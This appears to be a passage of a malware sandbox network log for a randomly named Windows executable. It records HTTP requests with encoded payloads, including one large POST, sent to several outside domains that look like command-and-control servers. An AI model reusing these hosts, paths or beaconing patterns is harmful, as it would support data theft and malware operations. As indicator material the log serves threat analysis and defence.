                                                                    Data Ascii: 1V=0anqji6gQT7yZFfL/XZMvoeMsuoITHZemHQ+Im2TL8fBTuyLUXkIFqxgbrioNVKjC3U7tEamojYgfTeCAn88HB0Q+Wow60/49Jt6H+biEFp0m+oj8+LuId/0CfHQPjC/fDooOF0yy/Lb2Mj152ueyuqw1kQAXJd7IYpt3dnik08Vc9BupL8+gf7UZlvNUKNhsgw61CPdoL2W/+vlBTuVIqtWmYys8mhRF9OZ+M/Q8YQl2P1nsFWxUmK152uLfgVV8PB4vfPhArgG1fZkk8ne7vMjX3hw2cmXkINTHa9L4uCKrVrO3EET+Fam/FXFfRyj6wEApyDog1Xd03WWzNHMUlztekCZTsxK99xhm3Y7kViahf/WlY2AR02FQZlmN9oFOg2o5PbBAFxZN6v7MN+NuyZOK9GYLo530PUXcxe1kKRS66QC4y4pHsgCJlWbOLrSaTpln7esvbXhfYqxOkRsYoizIy9glRwJBUKUwtZ4zpzi4bTBGZ8YFk5pGDBvqM5IEq09WGLh6H5/WqHn4rRs3DWDmYQ5jAyq1ygmyDME7bWOVA9nOypQRio4GFJl8R2UoKqr3x63q7VyPcCMKaKL5lBS4Dp7O3hzCRcF8BpLr6iN7j5m2+gfrATKGzyAtalsI42ygcRllRJEjXZ5TuJmYCW/t/2TqXpj9hNRzlC+9uRu3pxMWTbLLDm1uOvBdY0CF9tZs0QQ56mbcmVapDFhstm2FvAFTxmfgxSuB5ifAXRiPBM0kBOvJ/VQAC2j800i6TTZYIY7M3H/mh3d3rlGHJrZRh6PI4c2yQrjD+Oew9eRP/QYcMAFQLaW2bF+RtB3bVzZp9N3b1TbzQ+El/pXqsNLE8otVlBSq1pOOGh8h37D0VJkV2cLlaVm6USyMl+5xkpOpQss4B3m8qQksSCqRKzW8ROsrPxR9mGhLEGWCu7j68+U3zviCgEDVQVqKjr7pq8TpsQljPc4kKpk8MKaY7dKRQSzLMLYbB0IFMMvi0RWVcpKP [TRUNCATED]


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    32192.168.2.45003447.83.1.90801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:41:41.884637117 CET466OUTGET /ctdy/?1V=5YPKgWGFQCLPNGrM6Bx2/r3NiP9oDWgtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZFTIkqAxP+kzEnb1pVMGGKhBzsI5+lu+iJts=&w0DDw=KH0hz6 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.adadev.info
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:41:43.461720943 CET139INHTTP/1.1 567 unknown
                                                                    Server: nginx/1.18.0
                                                                    Date: Fri, 03 Jan 2025 10:41:43 GMT
                                                                    Content-Length: 17
                                                                    Connection: close
                                                                    Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                    Data Ascii: Request too large


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    33192.168.2.450035188.114.97.3801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:41:48.531265020 CET731OUTPOST /8rr3/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.cifasnc.info
                                                                    Origin: http://www.cifasnc.info
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.cifasnc.info/8rr3/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 76 4c 55 42 6c 6d 50 52 4b 6b 32 62 79 65 46 2f 71 67 46 34 34 76 6f 43 50 52 63 52 77 65 32 69 56 65 70 64 6c 52 2f 5a 76 52 74 61 54 55 34 38 6d 64 65 73 35 4b 6b 4a 4a 53 69 69 59 4b 33 56 70 4c 76 68 42 57 48 70 65 57 2f 77 66 6e 56 71 41 39 6f 57 2b 32 58 35 4a 30 62 59 34 4d 2f 30 56 56 50 70 6f 43 31 6e 36 34 50 6e 44 57 34 77 66 4d 43 66 69 6e 63 30 42 57 6f 66 66 51 72 69 6c 4b 65 4f 62 2b 2b 72 75 76 59 71 65 79 37 50 56 59 31 52 73 5a 64 6c 6e 4e 79 6f 58 38 39 47 69 41 53 2f 70 65 38 57 37 4b 47 74 50 44 37 74 35 30 53 71 33 31 4e 53 44 76 6c 4f 68 39 45 45 59 67 3d 3d
                                                                    Data Ascii: 1V=vLUBlmPRKk2byeF/qgF44voCPRcRwe2iVepdlR/ZvRtaTU48mdes5KkJJSiiYK3VpLvhBWHpeW/wfnVqA9oW+2X5J0bY4M/0VVPpoC1n64PnDW4wfMCfinc0BWoffQrilKeOb++ruvYqey7PVY1RsZdlnNyoX89GiAS/pe8W7KGtPD7t50Sq31NSDvlOh9EEYg==
                                                                    Jan 3, 2025 11:41:49.026953936 CET1236INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 03 Jan 2025 10:41:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-pingback: http://cifasnc.info/xmlrpc.php
                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    last-modified: Fri, 03 Jan 2025 10:41:48 GMT
                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    vary: Accept-Encoding,User-Agent
                                                                    x-turbo-charged-by: LiteSpeed
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OnjKP%2BcKgpmu%2BWe6kBGu0DkTBV0kGn9azM9D6sXqpSa%2FZTAotsCqZPkKOUobqKdhRlJ0ARFHphtAEMwd9WegtKRaczZKK2oYQLYZB657nG0GkpxdIWOTxvaSUZLQM30Kx0IA"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fc260e8cef54283-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1710&rtt_var=855&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=731&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 35 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 b4 48
                                                                    Data Ascii: 512Wo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L H
                                                                    Jan 3, 2025 11:41:49.026968956 CET1162INData Raw: 38 13 b7 a0 91 a7 44 69 59 32 8e 04 6a 8d 65 4a 6a 6b d5 9b 38 ae 1a 55 ad a4 ae e2 fb 52 c4 17 17 01 61 3c 64 ec 8e a3 a9 11 2d 01 bb 53 98 12 8b f7 36 ce 8d 21 d0 60 c1 68 4a 28 e7 7b 3a a7 96 c4 5b 15 e5 52 58 14 36 b6 35 36 68 e2 5b 54 68 63
                                                                    Data Ascii: 8DiY2jeJjk8URa<d-S6!`hJ({:[RX656h[Thcy!)oVJj4{{R2)bm'N8oxD,R6k;|(a3o)q|PJ40L&rhVXuDT2 ,!,m0%


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    34192.168.2.450036188.114.97.3801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:41:51.082818031 CET751OUTPOST /8rr3/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.cifasnc.info
                                                                    Origin: http://www.cifasnc.info
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.cifasnc.info/8rr3/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 76 4c 55 42 6c 6d 50 52 4b 6b 32 62 67 75 31 2f 6f 44 74 34 2b 50 6f 46 41 78 63 52 37 2b 32 6d 56 5a 68 64 6c 53 7a 4a 73 6e 39 61 54 32 51 38 6e 66 6d 73 36 4b 6b 4a 43 79 69 37 46 61 33 53 70 4c 72 44 42 57 72 70 65 53 76 77 66 6e 6c 71 41 4b 38 58 38 6d 58 2f 50 30 62 57 6e 63 2f 30 56 56 50 70 6f 43 78 4e 36 38 62 6e 41 6e 6f 77 66 70 69 41 38 58 63 31 47 57 6f 66 62 51 72 59 6c 4b 65 38 62 38 4b 4e 75 72 6f 71 65 79 72 50 56 71 4e 65 6d 5a 64 6a 36 39 7a 62 54 35 4d 59 6f 69 6a 68 72 65 77 34 34 37 61 36 4f 46 32 33 6f 46 7a 39 6c 31 70 68 65 6f 73 36 73 2b 35 4e 44 68 6b 42 4c 64 7a 63 75 48 4b 48 43 6b 71 39 58 46 2b 72 65 50 4d 3d
                                                                    Data Ascii: 1V=vLUBlmPRKk2bgu1/oDt4+PoFAxcR7+2mVZhdlSzJsn9aT2Q8nfms6KkJCyi7Fa3SpLrDBWrpeSvwfnlqAK8X8mX/P0bWnc/0VVPpoCxN68bnAnowfpiA8Xc1GWofbQrYlKe8b8KNuroqeyrPVqNemZdj69zbT5MYoijhrew447a6OF23oFz9l1pheos6s+5NDhkBLdzcuHKHCkq9XF+rePM=
                                                                    Jan 3, 2025 11:41:51.582040071 CET1236INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 03 Jan 2025 10:41:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-pingback: http://cifasnc.info/xmlrpc.php
                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    last-modified: Fri, 03 Jan 2025 10:41:51 GMT
                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    vary: Accept-Encoding,User-Agent
                                                                    x-turbo-charged-by: LiteSpeed
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6HpNq%2FzbsKZ3hZXCJ228v8boqupopXqT1vl7Vvr8Xy5%2BMuSf%2FSqr%2BviKX3jBYkHRLajwvMAZorQzwrNfCW06Rvu7fwwIElNqmrjjKmtJizQrA9l%2FvsqmuHgjObGiAydyqnal"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fc260f8bc7d8c0b-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1841&min_rtt=1841&rtt_var=920&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=751&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c
                                                                    Data Ascii: 51eWo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L
                                                                    Jan 3, 2025 11:41:51.582056046 CET1161INData Raw: e2 20 b4 48 38 13 b7 a0 91 a7 44 69 59 32 8e 04 6a 8d 65 4a 6a 6b d5 9b 38 ae 1a 55 ad a4 ae e2 fb 52 c4 17 17 01 61 3c 64 ec 8e a3 a9 11 2d 01 bb 53 98 12 8b f7 36 ce 8d 21 d0 60 c1 68 4a 28 e7 7b 3a a7 96 c4 5b 15 e5 52 58 14 36 b6 35 36 68 e2
                                                                    Data Ascii: H8DiY2jeJjk8URa<d-S6!`hJ({:[RX656h[Thcy!)oVJj4{{R2)bm'N8oxD,R6k;|(a3o)q|PJ40L&rhVXuDT2 ,!,m0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    35192.168.2.450037188.114.97.3801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:41:53.628392935 CET10833OUTPOST /8rr3/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.cifasnc.info
                                                                    Origin: http://www.cifasnc.info
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.cifasnc.info/8rr3/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 76 4c 55 42 6c 6d 50 52 4b 6b 32 62 67 75 31 2f 6f 44 74 34 2b 50 6f 46 41 78 63 52 37 2b 32 6d 56 5a 68 64 6c 53 7a 4a 73 6e 31 61 53 48 77 38 6e 34 4b 73 37 4b 6b 4a 42 79 69 2b 46 61 33 44 70 50 2f 48 42 57 58 35 65 51 6e 77 46 45 74 71 49 62 38 58 32 6d 58 2f 44 55 62 58 34 4d 2f 68 56 56 2b 69 6f 43 68 4e 36 38 62 6e 41 6b 67 77 57 63 43 41 2b 58 63 30 42 57 6f 54 66 51 71 33 6c 4b 47 47 62 38 4f 37 75 59 67 71 64 57 33 50 46 50 5a 65 37 4a 64 68 71 74 7a 44 54 35 49 35 6f 69 76 6c 72 64 73 53 34 37 2b 36 50 77 4c 62 37 51 54 68 35 56 46 6f 47 34 6c 46 67 64 64 4e 45 78 74 36 4e 2b 76 53 78 48 4c 76 44 57 53 77 54 68 43 4b 64 6f 48 56 58 30 2b 63 61 54 4d 6c 39 38 6b 78 6b 41 2f 58 31 59 61 5a 77 47 56 72 61 33 57 44 66 66 31 68 73 70 52 6c 2b 36 68 6a 5a 4b 69 66 72 4b 2b 73 58 37 6f 6c 77 50 69 2f 30 65 71 6d 62 46 39 32 43 6f 34 52 54 61 4d 52 74 33 7a 68 38 6d 63 66 7a 6e 70 38 2f 31 59 61 67 57 73 43 65 4e 43 36 50 42 65 70 7a 4f 51 59 53 56 4e 2f 6b 46 48 4b 53 4e 4f 77 55 66 62 [TRUNCATED]
                                                                    Data Ascii: 1V=vLUBlmPRKk2bgu1/oDt4+PoFAxcR7+2mVZhdlSzJsn1aSHw8n4Ks7KkJByi+Fa3DpP/HBWX5eQnwFEtqIb8X2mX/DUbX4M/hVV+ioChN68bnAkgwWcCA+Xc0BWoTfQq3lKGGb8O7uYgqdW3PFPZe7JdhqtzDT5I5oivlrdsS47+6PwLb7QTh5VFoG4lFgddNExt6N+vSxHLvDWSwThCKdoHVX0+caTMl98kxkA/X1YaZwGVra3WDff1hspRl+6hjZKifrK+sX7olwPi/0eqmbF92Co4RTaMRt3zh8mcfznp8/1YagWsCeNC6PBepzOQYSVN/kFHKSNOwUfbUpKB0XPrDUk8jZBP9hZ46zXmY4JIE3kvOso6ZeJFfBc1AN/WhN83oFOOxOos5XQJ0lmpt4S1zgKl1faiS/bSgrdrHeSev9mfs+w+DtIboHHiyjmEtSP/drINqMnqaXp0GcOU+S+MWsKb4FJksJ1tJ9TfCqyxmEYIeNQF0DfMzk8kjNuTxRIsEuu1iF8wnW5T6iyvLIZOt26io5/NfxY/GqDwpDlJ5uUOO5bKVuNrbnpLwqgFSwB2j37N7WqjkgNrSXc0et8HJiomuoYJFeXzd29RR2DmJgGlhqeOnrzlHUFqLeLx3sj3R57qeJgiRf1tefY+XzjhOEWH6BFJJvmnPE7twU946IgtoLsTw6XXKYArpIqphSfNqW5wjih9MBasu7KXu22Jy+HQRojRIGUlnSJ/W6YjSQBl3wHMGk0du8ftnpUf+KG95GugLYgON7fenstrFJUPhjenWYe+kS5f55HehjVc7fUkfJz64BLpJbQWj7qZFnokfzgG7KKvo5Ccfq9ji4FG2OFQvhYk5nhZpvwufIa1qf6AJrLxspmv9g8IfY0na8dCT73FI/c95yN4h/mlJ6vtgWUQvNZPotWjBCvKXP58cW/J9dVwIVQY93zwvZrpbBPY5SUWtS93P3doukiqsEyYiW0wh5JT4p+NShwfeA3D0z9VcH [TRUNCATED]
                                                                    Jan 3, 2025 11:41:54.160147905 CET1236INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 03 Jan 2025 10:41:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-pingback: http://cifasnc.info/xmlrpc.php
                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    last-modified: Fri, 03 Jan 2025 10:41:54 GMT
                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    vary: Accept-Encoding,User-Agent
                                                                    x-turbo-charged-by: LiteSpeed
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ajwElZ2UJYR8oEHAPmNGYNSpoGK6vM4J9J2kpNhYRTDIf0NGakl%2Fq44PboPsS9rgO0vxUaeyWSK07vJreOiOGkWNaWCDtuQVh4eCBdVh9N2UMcbcHCjZ0zNAn8R5PNSt2A2V"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fc26108ba0a4364-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1624&rtt_var=812&sent=7&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10833&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 35 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 b4 48 38
                                                                    Data Ascii: 512Wo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L H8
                                                                    Jan 3, 2025 11:41:54.160170078 CET1161INData Raw: 13 b7 a0 91 a7 44 69 59 32 8e 04 6a 8d 65 4a 6a 6b d5 9b 38 ae 1a 55 ad a4 ae e2 fb 52 c4 17 17 01 61 3c 64 ec 8e a3 a9 11 2d 01 bb 53 98 12 8b f7 36 ce 8d 21 d0 60 c1 68 4a 28 e7 7b 3a a7 96 c4 5b 15 e5 52 58 14 36 b6 35 36 68 e2 5b 54 68 63 af
                                                                    Data Ascii: DiY2jeJjk8URa<d-S6!`hJ({:[RX656h[Thcy!)oVJj4{{R2)bm'N8oxD,R6k;|(a3o)q|PJ40L&rhVXuDT2 ,!,m0%


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    36192.168.2.450038188.114.97.3801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:41:56.167958021 CET467OUTGET /8rr3/?1V=iJ8hmWjdEFuk0u09mxt/i+URJBIu2+/oU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH6nrWdXOKgOfZXH6QuC8SwJrjPV5LCLXfvVQ=&w0DDw=KH0hz6 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.cifasnc.info
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:41:56.688426018 CET1220INHTTP/1.1 301 Moved Permanently
                                                                    Date: Fri, 03 Jan 2025 10:41:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-pingback: http://cifasnc.info/xmlrpc.php
                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    last-modified: Fri, 03 Jan 2025 10:41:56 GMT
                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    location: http://cifasnc.info/8rr3/?1V=iJ8hmWjdEFuk0u09mxt/i+URJBIu2+/oU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH6nrWdXOKgOfZXH6QuC8SwJrjPV5LCLXfvVQ=&w0DDw=KH0hz6
                                                                    vary: User-Agent
                                                                    x-turbo-charged-by: LiteSpeed
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DNAwbFLz5B9s1PiZXZOCspG%2BDXQRTEea5IOXKLWtPI9THBG78yMB3QNmHbCtWMhptCA5%2FEekfJJqPdwSPvpNpg28igeiev4zqSnHmncOA491n6%2Bxa6Y%2F0Y0a1n7tiX7mJNnA"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fc261189fbd0fab-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1634&rtt_var=817&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=467&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    37192.168.2.450039199.59.243.228801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:42:09.878700972 CET755OUTPOST /dx3i/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.denture-prices.click
                                                                    Origin: http://www.denture-prices.click
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.denture-prices.click/dx3i/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 51 2b 69 53 35 57 69 5a 4f 70 49 6f 2f 58 4d 45 62 39 30 66 4d 62 62 44 46 4b 78 78 2f 43 43 73 38 6b 56 35 57 47 78 7a 65 79 52 76 59 4c 45 47 54 54 41 52 64 6e 35 73 72 58 6f 4d 58 53 6c 73 58 71 33 64 4d 4a 4b 31 6c 42 47 5a 6a 45 33 53 36 4f 6c 36 5a 30 44 41 39 47 46 6f 71 6d 4c 58 5a 2f 44 4b 64 4b 41 37 6b 64 73 65 4c 6f 52 46 49 47 58 57 5a 6b 49 67 6b 54 39 62 63 64 42 70 57 66 42 66 2b 4a 46 78 48 65 77 4d 6e 6b 63 31 70 37 2b 6c 51 51 33 44 65 6e 2b 78 45 62 50 49 47 56 59 6a 54 77 7a 73 6e 57 48 32 38 49 36 57 4b 69 62 30 68 34 44 6e 33 2b 37 71 73 32 4d 2b 7a 67 3d 3d
                                                                    Data Ascii: 1V=Q+iS5WiZOpIo/XMEb90fMbbDFKxx/CCs8kV5WGxzeyRvYLEGTTARdn5srXoMXSlsXq3dMJK1lBGZjE3S6Ol6Z0DA9GFoqmLXZ/DKdKA7kdseLoRFIGXWZkIgkT9bcdBpWfBf+JFxHewMnkc1p7+lQQ3Den+xEbPIGVYjTwzsnWH28I6WKib0h4Dn3+7qs2M+zg==
                                                                    Jan 3, 2025 11:42:10.330044031 CET1236INHTTP/1.1 200 OK
                                                                    date: Fri, 03 Jan 2025 10:42:10 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1146
                                                                    x-request-id: 4cb331b5-8a76-49cc-90e7-4641ef3f3b32
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==
                                                                    set-cookie: parking_session=4cb331b5-8a76-49cc-90e7-4641ef3f3b32; expires=Fri, 03 Jan 2025 10:57:10 GMT; path=/
                                                                    connection: close
